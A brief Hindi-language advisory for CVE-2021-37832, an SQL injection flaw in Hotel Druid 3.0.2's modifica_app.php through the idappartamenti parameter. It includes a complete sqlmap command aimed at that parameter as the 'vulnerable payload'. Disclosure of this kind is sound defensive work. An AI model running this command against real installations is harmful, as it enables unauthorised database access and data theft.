
CVE-2021-37832 - Hotel Druid 3.0.2 SQL इंजेक्शन भेद्यता - 9.8 CVSS 3.1
होटल ड्रूइड के संस्करण 3.0.2 में एक SQL इंजेक्शन भेद्यता मौजूद है जब एप्लिकेशन डेटाबेस के रूप में SQLite का उपयोग किया जा रहा हो। एक दुर्भावनापूर्ण हमलावर कमजोर idappartamenti पैरामीटर के माध्यम से SQLite डेटाबेस को SQL कमांड जारी कर सकता है।
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37832
https://nvd.nist.gov/vuln/detail/CVE-2021-37832#match-6858716
भेद्य PHP पृष्ठ:
modifica_app.php - idappartamenti पैरामीटर
भेद्य पेलोड
sqlmap -u "/modifica_app.php?tipo_tabella=appartamenti&anno=2021&id_sessione=&idappartamenti=01" --level=3 --risk=2 --banner --dbms=sqlite
जो हेले द्वारा खोजा गया, जुलाई 2021